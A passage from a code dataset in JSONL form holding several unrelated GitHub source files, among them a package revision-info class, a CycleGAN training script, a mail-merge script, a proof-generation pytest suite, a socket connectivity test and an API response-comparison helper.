png_file)\n\n","repo_name":"ASRauh/research1","sub_path":"constraint_force_integration.py","file_name":"constraint_force_integration.py","file_ext":"py","file_size_in_byte":5819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13018780925","text":"import hashlib\nimport json\n\nimport archive_info\nimport error\nimport package_info\nimport packages_info\n\n\nFIELD_PACKAGE_NAME = 'package_name'\nFIELD_REVISION = 'revision'\nFIELD_PACKAGE_TARGETS = 'package_targets'\n\nFIELD_REVISION_HASH = 'revision_hash'\n\n\nclass RevisionInfo(object):\n \"\"\"Revision information object describing a set revision for a package.\"\"\"\n def __init__(self, packages_desc, revision_file=None):\n \"\"\"Constructor for a RevisionInfo object.\n\n Args:\n packages_desc: Packages description containing all the necessary packages\n and package targets to verify a revision file is complete.\n revision_file: Optional JSON file representing a RevisionInfo object.\n \"\"\"\n assert isinstance(packages_desc, packages_info.PackagesInfo)\n self._packages_desc = packages_desc\n 
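# Added commentary (not in the original source): the package name and
# revision number start unset here; they are filled in either by
# LoadRevisionFile() when parsing a revision JSON file, or by
# SetRevisionNumber()/SetTargetRevision() when a revision is built by hand.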
self._revision_num = None\n self._package_name = None\n\n # A revision describes all the package_info's for each package target.\n # Every package target in the package_desc must have its revision set\n # for the revision info to be valid.\n self._package_targets = {}\n\n if revision_file is not None:\n self.LoadRevisionFile(revision_file)\n\n def __eq__(self, other):\n return (type(self) == type(other) and\n self._revision_num == other._revision_num and\n self._package_name == other._package_name and\n self._package_targets == other._package_targets)\n\n def _GetRevisionHash(self):\n \"\"\"Returns a stable hash for a revision file for validation purposes.\"\"\"\n hash_string = str(self._revision_num)\n hash_string += str(self._package_name)\n for package_target in sorted(self._package_targets):\n package_desc = self._package_targets[package_target]\n archive_list = package_desc.GetArchiveList()\n\n hash_string += str(package_target)\n for archive in archive_list:\n for field, member in archive.GetArchiveData()._asdict().iteritems():\n hash_string += '[%s:%s]' % (field, member)\n\n return hashlib.sha1(hash_string).hexdigest()\n\n def _ValidateRevisionComplete(self):\n \"\"\"Validate packages to make sure it matches the packages description.\"\"\"\n if self._package_name is None:\n raise error.Error('Invalid revision information - '\n 'no package name.')\n elif self._revision_num is None:\n raise error.Error('Invalid revision information - '\n 'no revision identifier')\n\n package_targets = self._packages_desc.GetPackageTargetsForPackage(\n self._package_name\n )\n\n if package_targets:\n package_targets = set(package_targets)\n revision_targets = set(self._package_targets.keys())\n\n if package_targets != revision_targets:\n raise error.Error('Invalid revision information - '\n 'target mismatch:'\n + '\\n%s:' % self._package_name\n + '\\n Required Target Packages:'\n + '\\n\\t' + '\\n\\t'.join(sorted(package_targets))\n + '\\n Supplied Target Packages:'\n + '\\n\\t' + '\\n\\t'.join(sorted(revision_targets)))\n\n def LoadRevisionFile(self, revision_file, skip_hash_verify=False):\n \"\"\"Loads a revision JSON file into this object.\n\n Args:\n revision_file: File name for a revision JSON file.\n skip_hash_verify: If True, will skip the hash validation check. 
This\n should only be used if a field has been added or\n removed in order to recalculate the revision hash.\n \"\"\"\n try:\n with open(revision_file, 'rt') as f:\n revision_json = json.load(f)\n\n self._package_name = revision_json[FIELD_PACKAGE_NAME]\n self._revision_num = revision_json[FIELD_REVISION]\n self._package_targets = {}\n\n package_targets = revision_json[FIELD_PACKAGE_TARGETS]\n for package_target, archive_list in package_targets.iteritems():\n self._package_targets[package_target] = package_info.PackageInfo(\n archive_list\n )\n except (TypeError, KeyError) as e:\n raise error.Error('Invalid revision file [%s]: %s' %\n (revision_file, e))\n\n self._ValidateRevisionComplete()\n\n if not skip_hash_verify:\n hash_value = revision_json[FIELD_REVISION_HASH]\n if self._GetRevisionHash() != hash_value:\n raise error.Error('Invalid revision file [%s] - revision hash check '\n 'failed' % revision_file)\n\n def SaveRevisionFile(self, revision_file):\n \"\"\"Saves this object to a revision JSON file to be loaded later.\n\n Args:\n revision_file: File name where revision JSON file will be saved.\n \"\"\"\n self._ValidateRevisionComplete()\n\n package_targets = {}\n for package_target, package_desc in self._package_targets.iteritems():\n package_targets[package_target] = package_desc.DumpPackageJson()\n\n revision_json = {\n FIELD_PACKAGE_NAME: self._package_name,\n FIELD_REVISION: self._revision_num,\n FIELD_PACKAGE_TARGETS: package_targets,\n FIELD_REVISION_HASH: self._GetRevisionHash()\n }\n\n with open(revision_file, 'wt') as f:\n json.dump(revision_json, f, sort_keys=True,\n indent=2, separators=(',', ': '))\n\n def SetRevisionNumber(self, revision_num):\n \"\"\"Sets the current revision number for this object.\"\"\"\n self._revision_num = revision_num\n\n def GetRevisionNumber(self):\n \"\"\"Gets the currently set revision number for this object.\"\"\"\n return self._revision_num\n\n def ClearRevisions(self):\n \"\"\"Clears all package information for this object\"\"\"\n self._package_name = None\n self._package_targets = {}\n\n def SetTargetRevision(self, package_name, package_target, package_desc):\n \"\"\"Sets a package description for a package target.\n\n The package description is a package_info object representing the package\n for this particular revision.\n\n Args:\n package_name: Name of the package this revision object represents.\n package_target: Package target name for the package we are setting.\n package_desc: package_info object representing the package target.\n \"\"\"\n if self._package_name is None:\n self._package_name = package_name\n elif self._package_name != package_name:\n raise error.Error('Revision information must be all for the '\n 'same package\\n'\n 'Original package name: %s\\nNew package name: %s'\n % (self._package_name, package_name))\n self._package_targets[package_target] = package_desc\n\n def GetPackageInfo(self, package_target):\n \"\"\"Gets the package description for a particular package target.\n\n The package description is a package_info object representing the package\n for this particular revision.\n\n Args:\n package_target: Package target name for which we want the package info.\n\n Returns:\n A package_info object for the package target, or None for invalid targets.\n \"\"\"\n return self._package_targets.get(package_target, 
None)\n","repo_name":"kiwibrowser/src","sub_path":"native_client/build/package_version/revision_info.py","file_name":"revision_info.py","file_ext":"py","file_size_in_byte":7105,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"70378326565","text":"import subprocess\nimport sys\nimport time\n\nsys.path.append(\"/nfs/project/libo_i/MADAN/cyclegan\")\nfrom options.train_options import TrainOptions\nfrom data import CreateDataLoader\nfrom models import create_model\nfrom util.visualizer import Visualizer\nimport torch\nimport logging\n\nif __name__ == '__main__':\n\topt = TrainOptions().parse()\n\tdata_loader = CreateDataLoader(opt)\n\tdataset = data_loader.load_data()\n\tdataset_size = len(data_loader)\n\tlogging.info('#training images = %d' % dataset_size)\n\tmodel = create_model(opt)\n\tmodel.setup(opt)\n\tvisualizer = Visualizer(opt)\n\ttotal_steps = 0\n\tfor epoch in range(opt.epoch_count, opt.niter + opt.niter_decay + 1):\n\t\tepoch_start_time = time.time()\n\t\titer_data_time = time.time()\n\t\tepoch_iter = 0\n\t\topt.current_epoch = epoch\n\t\tlogging.info(\"Current epoch update to {}\".format(opt.current_epoch))\n\t\tfor i, data in enumerate(dataset):\n\t\t\tif total_steps == 0:\n\t\t\t\tfor item in data.items():\n\t\t\t\t\tif isinstance(item[1], torch.Tensor):\n\t\t\t\t\t\tlogging.info(item[1].size())\n\t\t\titer_start_time = time.time()\n\t\t\tif total_steps % opt.print_freq == 0:\n\t\t\t\tt_data = iter_start_time - iter_data_time\n\t\t\tvisualizer.reset()\n\t\t\ttotal_steps += opt.batchSize\n\t\t\tepoch_iter += opt.batchSize\n\t\t\tmodel.set_input(data)\n\t\t\tmodel.optimize_parameters(opt)\n\t\t\t\n\t\t\tif total_steps % opt.display_freq == 0:\n\t\t\t\tsave_result = total_steps % opt.update_html_freq == 0\n\t\t\t\tvisualizer.display_current_results(model.get_current_visuals(), epoch, save_result)\n\t\t\t\n\t\t\tif total_steps % opt.print_freq == 0:\n\t\t\t\tlosses = model.get_current_losses()\n\t\t\t\tt = (time.time() - iter_start_time) / opt.batchSize\n\t\t\t\tvisualizer.print_current_losses(epoch, epoch_iter, losses, t, t_data)\n\t\t\t\tif opt.display_id > 0:\n\t\t\t\t\tvisualizer.plot_current_losses(epoch, float(epoch_iter) / dataset_size, opt, losses)\n\t\t\t\n\t\t\tif total_steps % opt.save_latest_freq == 0:\n\t\t\t\tlogging.info('saving the latest model (epoch %d, total_steps %d)' % (epoch, total_steps))\n\t\t\t\tmodel.save_networks('latest')\n\t\t\titer_data_time = time.time()\n\t\t\n\t\tif epoch % opt.save_epoch_freq == 0:\n\t\t\tlogging.info('saving the model at the end of epoch %d, iters %d' % (epoch, total_steps))\n\t\t\tmodel.save_networks('latest')\n\t\t\tmodel.save_networks(epoch)\n\t\t\n\t\tlogging.info('End of epoch %d / %d \\t Time Taken: %d sec' % (epoch, opt.max_epoch, time.time() - epoch_start_time))\n\t\tmodel.update_learning_rate()\n","repo_name":"Luodian/MADAN","sub_path":"cyclegan/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","stars":163,"dataset":"github-code","pt":"52"} +{"seq_id":"1384519989","text":"def automation_invitation():\n with open(\"/mail-merge-project-start/Input/Names/invited_names.txt\", mode=\"r\") as names:\n name_list = names.readlines()\n perfect_name = [elements.strip() for elements in name_list]\n \n \n with open(\"/mail-merge-project-start/Input/Letters/starting_letter.txt\", mode=\"r\") as mail:\n mail_list = mail.read()\n for lp in perfect_name:\n replace = mail_list.replace(\"[name]\", 
lp)\n with open(f\"/mail-merge-project-start/Output/ReadyToSend/letter_for_{lp}.txt\", mode=\"w\") as invitation:\n invitation.write(replace)\n\nautomation_invitation()\n","repo_name":"YuvanVarshith/Mail_Merge_Automation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38279809564","text":"#!/usr/bin/python3\n#####################################################\n# Author: Vojtěch Ulej (xulejv00) #\n# Created: 4. 11. 2020 #\n# Description: Implementation of function plot_stat #\n#####################################################\n\nimport download\nimport os\nfrom sys import argv\nimport code\nimport argparse\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Function takes data from data_source and plots them\ndef plot_stat(data_source, fig_location=None, show_figure=False):\n regs = data_source[1][0] # np.array of regions\n dates = data_source[1][4] # np.array of dates\n regions = np.unique(regs) # array of unique regions\n years = set() # All years from dataset\n for d in dates:\n years.add(d.astype(object).year)\n years = sorted(years)\n accidents_by_reg_year = [] # Accidents in region and year (list of tupple(region, year, accidents_count))\n for r in regions:\n accidents_dates_by_reg = dates[regs == r] # Accidents dates in region r\n for i in range(len(years)):\n if i != len(years) - 1:\n # Count of accidents in year years[i]\n # This is calculated ass accidents till year years[i] - accidents till year years[i+1]\n # eg. Accident for year >= 2016 - year >= 2017\n count = np.count_nonzero(accidents_dates_by_reg >= np.datetime64(str(years[i]))) - np.count_nonzero(\n accidents_dates_by_reg >= np.datetime64(str(years[i + 1])))\n else: # last year\n count = np.count_nonzero(accidents_dates_by_reg >= np.datetime64(str(years[i])))\n accidents_by_reg_year.append((r, years[i], count))\n # Sort accidents by year and count (reverse) so first is region with highest count of accidents in highest year (2020)\n accidents_by_reg_year.sort(key=lambda x: x[2], reverse=True) # Sort by count\n accidents_by_reg_year.sort(key=lambda x: x[1], reverse=True) # Sort by year\n i = 0\n data_to_plot = [] # every element is tuple of tuples(region,year,accident_count) where year is same\n while i != len(accidents_by_reg_year): #\n data_to_plot.append(tuple(accidents_by_reg_year[i:i + len(regions)]))\n i += len(regions)\n # Figure for ploting\n fig, ax = plt.subplots(len(data_to_plot),figsize=(7.75,10.25)) # figsize = a4 format in inches (nicer graphs for more regions)\n # This cycle creates subplots for each year\n for idx, data in enumerate(data_to_plot):\n rects = ax[idx].bar([i[0] for i in data], [i[2] for i in data])\n # Annotation\n for i, rect in enumerate(rects):\n ax[idx].annotate(str(i+1) + '.',\n xy=(rect.get_x() + rect.get_width() / 2, rect.get_height()),\n xytext=(0, 1),\n textcoords=\"offset points\",\n ha='center', va='bottom'\n )\n ax[idx].set_title(str(data[0][1])) # Title of subplot is year\n y_l = ax[idx].get_ylim()\n ax[idx].set_ylim([y_l[0],y_l[1]+((y_l[1]/100)*15)]) # Make room for annotation (adding 15% to y max)\n ax[idx].set_ylabel(' ') # Make room for figure text 'Počet nehod'\n if data is data_to_plot[-1]: # if making last plot create x lable (same for every subplot so its not neccessery to write it to every subplot)\n ax[idx].set_xlabel('Kraje')\n fig.suptitle('Srovnání počtu nehod v krajích za jednotlivé roky')\n fig.text(0.015, 0.5, 
'Počet nehod', va='center', rotation='vertical')\n fig.tight_layout()\n if fig_location is not None: # if location specified save figure\n dire = '/'.join(fig_location.split('/')[:-1]) # directories name\n if dire != '':\n if not os.path.exists(dire):\n os.makedirs(dire) # create dir\n fig.savefig(fig_location)\n if show_figure:\n fig.show()\n\n\nif __name__ == \"__main__\":\n DataDownloader = download.DataDownloader\n parser = argparse.ArgumentParser(description='Plot data for regions given to function plot_stat.')\n # To this variables will be stored values from cmd arguments\n show_figure = False\n fig_location = None\n ############################################################\n parser.add_argument('--show_figure', dest='show_figure', action='store_const',const=True, default=False)\n parser.add_argument('--fig_location', dest='fig_location', type=str, action='store', default=None)\n args,_ = parser.parse_known_args(argv[1:])\n show_figure = args.show_figure\n fig_location = args.fig_location\n # Example how to run function:\n # plot_stat(DataDownloader().get_list(),show_figure=True,fig_location='data/plot.png')\n # Running interactive console so user can run function\n code.interact(local=locals())\n\n","repo_name":"OrenVo/IZV-proj","sub_path":"1stPart/get_stat.py","file_name":"get_stat.py","file_ext":"py","file_size_in_byte":4833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4677042510","text":"#!/usr/bin/env python3\n\nimport pytest\nfrom collections import defaultdict\nfrom glob import glob\nfrom os import path, makedirs\nimport time\nfrom tabulate import tabulate\nfrom typing import Dict, List, NamedTuple, Optional, Tuple, no_type_check\nfrom subprocess import check_call, check_output\nfrom sys import argv\n\nimport maude\n\ntest_dir=\".build\"\n\n\n### Benchmarks ##################\n\nclass Benchmark(NamedTuple):\n join: Optional[int] = None\n compile: Optional[int] = None\n check: Optional[int] = None\n gen_mm0: Optional[int] = None\n join_mm0: Optional[int] = None\n gen_mm1: Optional[int] = None\n\nbenchmarks : Dict[str, Benchmark] = defaultdict(lambda: Benchmark())\n\ndef print_benchmarks() -> None:\n print(tabulate(((name, *value) for (name, value) in sorted(benchmarks.items())),\n headers=('name',) + Benchmark._fields\n ) )\n\nclass _Benchmark():\n def __init__(self, test_name: str, aspect: str):\n self.test_name = test_name\n self.aspect = aspect\n self.start = time.time_ns()\n def __enter__(self):\n return self\n def __exit__(self, exc_type, exc_val, exc_tb):\n end = time.time_ns()\n runtime = (end - self.start)\n benchmarks[self.test_name] = benchmarks[self.test_name]._replace(**{self.aspect: runtime})\n\ndef benchmark(test_name: str, aspect: str) -> _Benchmark:\n return _Benchmark(test_name, aspect)\n\n\n### PyTest Helpers #####################\n\ndef regex_to_id(exp: str) -> str:\n return exp.replace(' ', '') \\\n .replace('*', 'x') \\\n .replace('(', 'C') \\\n .replace(')', 'D') \\\n .replace('/\\\\', '@') \\\n .replace('\\\\/', '+') \\\n\n@no_type_check\ndef slow(*args):\n return pytest.param(*args, marks=pytest.mark.slow)\n\n### MM0 Helpers #######################\n\ndef join(input_file: str, output_file: str) -> None:\n check_call(['mm0-rs', 'join', input_file, output_file])\ndef compile(input_file: str, output_file: str) -> None:\n check_call(['mm0-rs', 'compile', '-q', '--warn-as-error', input_file, output_file])\ndef check(mmb_file: str, mm0_file: str) -> None:\n with open(mm0_file) as f:\n 
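# Added commentary (assumption, not in the original source): mm0-c appears
# to take the compiled .mmb proof as its argument and read the joined .mm0
# specification on stdin, which is why the spec file is opened and passed
# as stdin to check_call here.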
check_call(['mm0-c', mmb_file], stdin=f)\n\ndef run_proof_gen(mode: str, theorem: str, regex: str, output_file: str) -> None:\n with open(output_file, 'w') as f:\n check_call(['./proof-gen.py', mode, theorem, regex], stdout=f)\n\n\n### Tests: Maude #######################\n\ndef test_maude_version() -> None:\n maude.check_maude_version()\n\ndef test_maude_unit_tests() -> None:\n assert maude.reduce_in_module('test.maude', 'TEST', 'TestResult', 'unit-tests') == 'passed'\n\n\n### Test: proof check base MM0/1 files ##########################\n\nmakedirs(test_dir, exist_ok=True)\nlast_mm0_file = None\nbase_mm_tests = []\nfor f in sorted((glob('*.mm0') + glob('*.mm1'))):\n if path.splitext(f)[1] == '.mm0':\n last_mm0_file = path.join(test_dir, 'joined.' + f)\n join(f, last_mm0_file)\n assert last_mm0_file\n base_mm_tests += [(last_mm0_file, f)]\n\n@pytest.mark.parametrize('mm0_file,mm1_file', base_mm_tests)\ndef test_mm(mm0_file: str, mm1_file: str) -> None:\n basename = path.basename(mm1_file)\n test_name, extension = path.splitext(basename)\n output_basename = path.join(test_dir, test_name)\n output_joined = path.join(test_dir, test_name + '.joined' + extension)\n output_mmb = path.join(test_dir, test_name + '.mmb')\n\n print(\"Testing: %s\" % test_name)\n # There seems to be a bug in mm0-rs that causes the program to crash\n # when compiling un-joined files.\n with benchmark(test_name, 'join'): join(mm1_file, output_joined)\n with benchmark(test_name, 'compile'): compile(output_joined, output_mmb)\n with benchmark(test_name, 'check'): check(output_mmb, mm0_file)\n\n\n### Test: proof generated certificates ##########################\n\n@pytest.mark.parametrize('theorem,test_name,regex',\n[ ('main-goal', 'a-or-b-star', '(a + b)*'),\n ('main-goal', 'kleene-star-star', '(a *) * ->> (a *)'),\n ('main-goal', 'example-in-paper', '(a . a)* ->> (((a *) . a) + epsilon) '),\n ('main-goal', 'alternate-top', '((a *) . b) * + (((b *) . a) *)'),\n ('main-goal', 'even-or-odd', '((((a . a) + (a . b)) + (b . a)) + (b . b)) * + ((a + b) . (((((a . a) + (a . b)) + (b . a)) + (b . b)) *))'),\n ('main-goal', 'no-contains-a-or-no-only-b', '(~ (top . (a . 
top))) + ~ (b *)'),\n])\ndef test_regex(theorem: str, test_name: str, regex: str) -> None:\n output_mm0_file = path.join(test_dir, test_name + '.mm0')\n output_joined_mm0_file = path.join(test_dir, test_name + '.joined.mm0')\n output_mm1_file = path.join(test_dir, test_name + '.mm1')\n output_joined_mm1_file = path.join(test_dir, test_name + '.joined.mm1')\n\n with benchmark(test_name, 'gen_mm0'): run_proof_gen('mm0', theorem, regex, output_mm0_file)\n with benchmark(test_name, 'join_mm0'): join(output_mm0_file, output_joined_mm0_file)\n with benchmark(test_name, 'gen_mm1'): run_proof_gen('mm1', theorem, regex, output_mm1_file)\n test_mm(output_joined_mm0_file, output_mm1_file)\n\n# Benchmarks from Unified Decision Procedures for Regular Expression Equivalence\n# https://citeseerx.ist.psu.edu/document?repid=rep1&type=pdf&doi=f650281fc011a2c132690903eb443ff1ab3298f7\n\n@pytest.mark.parametrize('n', [1, 2, 4, slow(10), slow(20), slow(30), slow(40), slow(100)])\ndef test_regex_match_l(n: int) -> None:\n test_regex('main-goal', 'match-l-{:03d}'.format(n), 'match-l({})'.format(n))\n\n@pytest.mark.parametrize('n', [1, 2, 4, slow(10), slow(20), slow(30)])\ndef test_regex_match_r(n: int) -> None:\n test_regex('main-goal', 'match-r-{:03d}'.format(n), 'match-r({})'.format(n))\n\n@pytest.mark.parametrize('n', [1, 2, 4, slow(10), slow(20), slow(30)])\ndef test_regex_eq_l(n: int) -> None:\n test_regex('main-goal', 'eq-l-{:03d}'.format(n), 'eq-l({})'.format(n))\n\n@pytest.mark.parametrize('n', [1, 2, 4, slow(10), slow(20), slow(30)])\ndef test_regex_eq_r(n: int) -> None:\n test_regex('main-goal', 'eq-r-{:03d}'.format(n), 'eq-r({})'.format(n))\n\n@pytest.mark.parametrize('n', [1, 2, 4, slow(10), slow(20), slow(30)])\ndef test_regex_eq_lr(n: int) -> None:\n test_regex('main-goal', 'eq-lr-{:03d}'.format(n), 'eq-lr({})'.format(n))\n\n@pytest.mark.parametrize('exp', [\n 'a',\n '(a . a) . (a . a)',\n '(a + b)',\n '(( (b . b) * ) . ( b * ))',\n '( a /\\\\ ( a /\\\\ b ) )',\n '(bot . bot)*',\n])\ndef test_regex_implies_self(exp: str) -> None:\n id = regex_to_id(exp)\n test_regex('main-goal', 'implies-self-{}'.format(id), '{} ->> {}'.format(exp, exp))\n\n\n### Randomized tests using hypothesis\n\nfrom typing import Callable\nimport hypothesis\nfrom hypothesis import given, settings\nfrom hypothesis.strategies import composite, just, recursive, SearchStrategy, DrawFn\n\ndef regex() -> SearchStrategy[str]:\n\n def epsilon() -> SearchStrategy[str]:\n return just('epsilon')\n\n def bot() -> SearchStrategy[str]:\n return just('bot')\n\n def letters() -> SearchStrategy[str]:\n return just('a') | just('b')\n\n @composite\n def neg(draw: DrawFn, arg: SearchStrategy[str]) -> str:\n return '( ~ ' + draw(arg) + ')'\n\n @composite\n def kleene(draw: DrawFn, arg: SearchStrategy[str]) -> str:\n return '( ' + draw(arg) + ' * )'\n\n @composite\n def concat(draw: DrawFn, arg: SearchStrategy[str]) -> str:\n return '(' + draw(arg) + ' . 
' + draw(arg) + ')'\n\n    @composite\n    def plus(draw: DrawFn, arg: SearchStrategy[str]) -> str:\n        return '( ' + draw(arg) + ' + ' + draw(arg) + ' )'\n\n    return recursive(bot() | epsilon() | letters(),\n                     lambda sub: concat(sub) | kleene(sub) | plus(sub))\n\n@given(regex())\n@settings(deadline=20*1000, verbosity=hypothesis.Verbosity.verbose, max_examples=10)\n@pytest.mark.slow\ndef test_equiv(exp):\n    test_regex_implies_self(exp)\n\n\nprint_benchmarks()\n","repo_name":"MirceaS/matching-logic-mm0","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":8018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24163082311","text":"#!/usr/bin/python3\n\nimport socket\nimport subprocess\nimport sys\nimport os\n\n# if no port is passed, a connection to localhost is assumed and a server is spun up to listen\n# if we're connecting to a local server, we spin through a list of 100 ports to find whatever's available\ndef conntest(host, portIn=None):\n    cdemo = os.path.join(sys.path[0], \"../cdemo/cdemo\")\n    if not os.path.isfile(cdemo):\n        cdemo += \".exe\"\n        if not os.path.isfile(cdemo):\n            print(\"Test code must be compiled prior to running test.\")\n            sys.exit(1)\n\n    if portIn is None:\n        addr = socket.getaddrinfo(host, 0,0, socket.SOCK_STREAM)\n        af,socktype, proto, canonname, sa = addr[0]\n        s = socket.socket(af, socket.SOCK_STREAM)\n        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n        for port in range (8000,8100):\n            try:\n                s.bind((host, port))\n                break\n            except OSError:\n                pass\n        s.listen(1)\n    else:\n        port = portIn\n    p = subprocess.Popen([cdemo, host, str(port)])\n    # the echo loop only applies when we spun up a local listener; with a remote\n    # host there is no server socket here, so we just wait for the client to exit\n    if portIn is None:\n        conn, addr = s.accept()\n\n        while True:\n            try:\n                data = conn.recv(1024)\n            except socket.timeout:\n                print(\"timeout\")\n                break # data would be unbound below, so stop on timeout\n            if not data:\n                break\n            else:\n                conn.send(data)\n                conn.send(data)\n                conn.send(data)\n                conn.close()\n                s.close()\n                break\n\n    return p.wait()\n\ndef setup_module():\n    os.environ['LD_LIBRARY_PATH'] = '..'\n\ndef test_ack_loop_v4():\n    assert conntest(\"127.0.0.1\") == 0, \"IPv4 loopback test\"\n\ndef test_ack_loop_v6():\n    assert conntest(\"::1\") == 0, \"IPv6 loopback test\"\n\ndef test_ack_remote_v4():\n    assert conntest(\"ipv4.google.com\", 80) == 0, \"IPv4 remote test\"\n\ndef test_ack_remote_v6():\n    assert conntest(\"ipv6.google.com\", 80) == 0, \"IPv6 remote test\"\n","repo_name":"n8vi/acktrack","sub_path":"tests/test_functional.py","file_name":"test_functional.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"5643941397","text":"# Definition for singly-linked list.\r\n# class ListNode:\r\n#     def __init__(self, val=0, next=None):\r\n#         self.val = val\r\n#         self.next = next\r\nclass Solution:\r\n    def reverseKGroup(self, head: Optional[ListNode], k: int) -> Optional[ListNode]:\r\n        dummy = ListNode(0, head)\r\n        grouprev = dummy\r\n\r\n        while True:\r\n            kth = self.getkth(grouprev, k)\r\n            if not kth:\r\n                break\r\n            groupNext = kth.next\r\n\r\n            prev, curr = kth.next, grouprev.next\r\n            while curr != groupNext:\r\n                temp = curr.next\r\n                curr.next = prev\r\n                prev = curr\r\n                curr = temp\r\n            temp = grouprev.next\r\n            grouprev.next = kth\r\n            grouprev = temp\r\n        return dummy.next\r\n\r\n    def getkth(self, curr, k):\r\n        while curr and k > 0:\r\n            curr = curr.next\r\n            k -= 1\r\n        return curr\r\n","repo_name":"samyogita/LeetCode-problems","sub_path":"reversenodekgroup.py","file_name":"reversenodekgroup.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"43182891399","text":"#LeetCode 53\n\nclass Solution:\n    def maxSubArray(self, nums: List[int]) -> int:\n\n        if len(nums) == 1:\n            return nums[0]\n\n        newNum = maxTotal = nums[0]\n\n        for i in range(1, len(nums)):\n            newNum = max(nums[i], nums[i] + newNum) #This will give Maximum Ending Number so far\n            maxTotal = max(newNum, maxTotal) #This will give Maximum Global Number so far\n\n        return maxTotal\n","repo_name":"rajpatel9498/LeetCode_Solutions","sub_path":"Easy/MaximumSubarray.py","file_name":"MaximumSubarray.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7056449641","text":"#__author__='cuiwenhao'\n#-*-coding:utf-8-*-\nimport importlib,sys,os,json,logging\nimportlib.reload(sys)\n\nfrom Common.Operation_Interface import Operation_Interface\nOperation_db = Operation_Interface()\n\n\nclass Compare_param(object):\n    '''\n    Comparison class with three methods: code comparison, parameter completeness comparison and functional test comparison\n    '''\n    # initialize data\n    def __init__(self,params_interface):\n        global result\n        self.params_interface = params_interface  # interface input parameters\n        self.id_case=params_interface['id']  # test case id\n        self.result_list_response=[]  # empty list used to store the parameter set\n        self.params_to_compare=params_interface['params_to_compare']\n\n\n    # compare the key parameter value (code)\n    def Compare_code(self,result_interface):\n        '''\n        :param result_interface: HTTP response body\n        :return: return code, message and data\n        '''\n        try:\n            if json.loads(result_interface):\n                temp_result_interface=json.loads(result_interface)  # convert the string into a dict\n                temp_code_to_compare=self.params_interface['code_to_compare']  # name of the code field to compare\n                if temp_code_to_compare in temp_result_interface:\n                    if str(temp_result_interface[temp_code_to_compare])==str(self.params_interface['code_expect']):\n                        result={'code':'0000','message':u'key parameter matches','data':[]}\n                        Operation_db.op_sql(\"UPDATE case_interface set code_actual='%s',result_code_compare=%s,result_interface='%s' where id='%s'\"\n                                            %(temp_result_interface[temp_code_to_compare],0,result_interface,self.id_case))\n                    elif str(temp_result_interface[temp_code_to_compare])!=str(self.params_interface['code_expect']):\n                        result = {'code':'1003','message':u'key parameter does not match','data':[]}\n                        Operation_db.op_sql(\"UPDATE case_interface set code_actual='%s',result_code_compare=%s,result_interface='%s' where id='%s'\"\n                                            %(temp_result_interface[temp_code_to_compare],1,result_interface,self.id_case))\n\n                    else:\n                        result={'code':'1002','message':u'key parameter comparison error','data':[]}\n                        Operation_db.op_sql(\"UPDATE case_interface set code_actual='%s',result_code_compare=%s,result_interface='%s' where id='%s'\"\n                                            % (temp_result_interface[temp_code_to_compare], 3, result_interface,self.id_case))\n\n\n                else:\n                    result={'code':'1001','message':u'response has no key parameter','data':[]}\n                    Operation_db.op_sql(\"UPDATE case_interface set result_code_compare=%s,result_interface='%s' where id='%s'\"\n                                        %(2,result_interface,self.id_case))\n\n            else:\n                result = {'code': '1000', 'message': u'response format is invalid', 'data': []}\n                Operation_db.op_sql(\"UPDATE case_interface set result_code_compare=%s,result_interface='%s' where id='%s'\"\n                                    %(4,result_interface,self.id_case))\n\n        except Exception as error:  # log to the log.txt file\n            result= {'code': '9999', 'message': u'key parameter comparison exception', 'data': []}\n            Operation_db.op_sql(\"UPDATE case_interface set result_code_compare=%s,result_interface='%s' where id='%s'\"\n                                %(9,result_interface,self.id_case))\n\n            logging.basicConfig(filename=os.path.join(os.getcwd(), '../Log/syserror.log'),\n                                level=logging.DEBUG,\n                                format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s')\n            logger = logging.getLogger(__name__)\n            logger.exception(error)\n        return result\n\n    # write the parameter names from the interface response into a list\n    def Get_compare_params(self,result_interface):\n        '''\n        :param result_interface: HTTP response body\n        :return: return code, message and data\n        '''\n        try:\n            if json.loads(result_interface):\n                temp_result_interface=json.loads(result_interface)  # convert the string into a dict\n                self.result_list_response= list(temp_result_interface.keys())\n\n                result= {'code': '0000', 'message': u'success', 'data':self.result_list_response}\n            else:\n                result= {'code': '1000', 'message': u'response format is invalid', 'data':[]}\n        except Exception as error:  # log to the log.txt file\n            result = {'code': '9999', 'message': u'data processing exception', 'data': []}\n\n            logging.basicConfig(filename=os.path.join(os.getcwd(), './syserror.Log'),\n                                level=logging.DEBUG,\n                                format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s')\n            logger = logging.getLogger(__name__)\n            logger.exception(error)\n        return result\n\n    # parameter completeness comparison: compare the given values with the result of Get_compare_params\n    def Compare_params_complete(self,result_interface):\n        '''\n        :param result_interface: HTTP response body\n        :return: return code, message and data\n        '''\n        try:\n            temp_compare_params=self.Get_compare_params(result_interface)  # get the parameter set of the response\n            if temp_compare_params['code']=='0000':\n                temp_result_list_response=temp_compare_params['data']  # deduplicated list of parameters returned by the interface\n\n\n                if self.params_to_compare==u'' or isinstance(self.params_to_compare,(tuple,dict)):  # the test case data is empty or of the wrong type\n                    result = {'code': '4001', 'message': u'invalid parameter set to compare in the test case', 'data': 